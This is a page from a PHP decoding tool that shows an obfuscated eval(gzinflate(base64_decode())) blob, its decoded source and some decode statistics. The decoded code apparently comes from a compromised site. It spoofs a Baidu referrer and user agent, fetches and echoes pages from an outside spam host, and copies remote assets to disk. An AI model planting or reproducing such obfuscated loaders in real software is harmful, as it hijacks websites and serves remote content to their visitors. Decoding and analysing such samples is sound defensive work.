Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

eval(gzinflate(base64_decode('lVZtT+NGEP5eqf9hiXzn9dXYTjg4ldTkcsFAdCFBiVNUodTaOOt4wW9ab7i..

Decoded Output download


 header("Cache-Control:max-age=250"); $refer = 'https://m.baidu.com/?from=222'; $szUrl = "http://mzbdm.cybnvz.com/xmbd/sbshmj/index.php"; $UserAgent = 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36'; $curl = curl_init(); curl_setopt($curl, CURLOPT_REFERER, $refer); curl_setopt($curl, CURLOPT_URL, $szUrl); curl_setopt($curl, CURLOPT_HEADER, 0); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false); curl_setopt($curl, CURLOPT_ENCODING, ''); curl_setopt($curl, CURLOPT_USERAGENT, $UserAgent); curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1); $data = curl_exec($curl); echo $data; exit(); preg_match_all('/(?:link href|src|^<img src)="(.*?[css|js|jpg|png|gif])"/', $data, $js); foreach($js[1] as $key =>$v){ $dir = dirname($v); $result=httpcopy("http://baidu.csetc.cn/".$v,'','',$dir); } if(!empty($result)){ echo $data; } function httpcopy($url,$file='',$timeout=60,$dir){ $file=empty($file)?pathinfo($url,PATHINFO_BASENAME):$file; $dir=pathinfo($file,PATHINFO_DIRNAME)."/".$dir."/"; !is_dir($dir)&&@mkdir($dir,0755,true); $url=str_replace(' ',"%20",$url); $result=array('fileName'=>'','way'=>'','size'=>0,'spendTime'=>0); $startTime=explode(' ',microtime()); $startTime=(float)$startTime[0]+(float)$startTime[1]; if(function_exists('curl_init')){ $ch=curl_init(); curl_setopt($ch,CURLOPT_URL,$url); curl_setopt($ch,CURLOPT_TIMEOUT,$timeout); curl_setopt($ch,CURLOPT_RETURNTRANSFER,TRUE); $temp=curl_exec($ch); if(@file_put_contents($dir.$file,$temp)&&!curl_error($ch)){ $result['fileName']=$file; $result['way']='curl'; $result['size']=sprintf('%.3f',strlen($temp)/1024); } }else{ $opts=array( 'http'=>array( 'method'=>'GET', 'header'=>'', 'timeout'=>$timeout ) ); $context=stream_context_create($opts); if(@copy($url,$file,$context)){ $result['fileName']=$file; $result['way']='copy'; $result['size']=sprintf('%.3f',strlen($context)/1024); } } $endTime=explode(' ',microtime()); $endTime=(float)$endTime[0]+(float)$endTime[1]; $result['spendTime']=round($endTime-$startTime)*1000; return $result; } $cache->set($name, $value, $expire = 20); ?>

Did this file decode correctly?

Original Code

 eval(gzinflate(base64_decode('lVZtT+NGEP5eqf9hiXzn9dXYTjg4ldTkcsFAdCFBiVNUodTaOOt4wW9ab7iEwn/vrF9IelVzVIrwzvqZmZ3nmVnz808opGRBOW70iB/Sw16aCJ5GpzFZH5IltVvHVkNrI4XTgHJkIzUUIstPTTM25oQtVoafxmYn4Glst1otFZD505RHgGxIpAQ+zRex4W/myeNTgV7H84WZz/MwvjdZsqBrIwuzBnhOc8q7S5oImec6fWJRRMxjw0L4FnDptxwNXXRiNNvodnR78lFD3SyL6C2df2XCPD76ZBydIPz1yr0e6ChiDxRdUv8h1VAvhONR88QyLOOo2WwZv1poQgLCWeUlj+2vilPLh8cSJjBUXRg5FWkmcAHQUW86HoxuXG/sXDhjZ6xXzOwHw0OviNkPvHK65zKo9aPk7nQ8dMfd4eRCwpv74ZPJwPvdGfcv/rhxJDwgUU7f6nI1mrhvcnGGvdF5f3ipI1X9AR0TZ9y9dIYQd6v5fpeL0WAwuh2Mel23PxqWFSsLIkgtGV1Tv3SCN9QP0/I1rNellhmnSy8mwg89EkVYNXHnNGLJAwpBwOec+89//sbiJYKVZjew8aFz5+f58z38suVzliyflyyYaQ1T1cvQ8LjPIXCQcgqjg8G6a84QyZHyQDfIPlMetb8AyuTYwN+ExBTDXjFM+SoSthwQP802uB6VaqKAAt/wE7NhKI+6qsqfDAOeL4gF+IDGmdjgKooGSXbrfUHBKvEFSxP0Gl+RXCoBi6gtYwkW03Ql7BOrjAunLN5VceVa62REhCwJ0tL5pute9YcXI+9Ld+IMu9eOdlrg2kWB9hYsN7fo8/64ABsNWQwg5aKNDljugYGL7O/ff44faku3Ph0f64KvZLPJzHYuuMdpFhGfYhWpeuNdy2roSil0zSThnGywKpMPgWbVPpO0fSObapWzJ7lpwSqjycJlBUZOmZILwoXcsOk6i9JFmSVmPk8lT1j7JwgHUUqEtt25s2a//HuzOWtLqWopoD1ZLnKsvl4vqtRN8UN7z4UT6rsXSFXyf0Hc/rUzmrqv6u6Bfnd9uOOpI4sUoL+9O0yhVhTxWdLqZSvh+fBxgFHNC6mMUuvCDUQ8KD05T3nhKssr1bnb6jKz666pX0mNZnbBi7qzXQg2s/OMs0QEWH1nHAWqDr0Q0QSXKc2m1fpYzMQLhcsJ0kGdedUK5XcKNK7NmIowXch2uHRcGGG1/OyV/YHUijQwa/6QhiQpRclrIduQktirTM8HS8A4y5QVS99Nml67/l8mIMzbmahz7JCBlKrD9zV0Dak7t7J3m7nekq28Pc3r+Mxsnq6SBa5xh9vu1z40LctqI07Fiie1szyc4hf/ZJxBU2JFXohwiT6SaCWfcFrGKdyVLTmXnbO/AQ==')));

Function Calls

gzinflate 1
base64_decode 1

Variables

None

Stats

MD5 9d52002c9d6e5d1384041b1ee938d37b
Eval Count 1
Decode Time 81 ms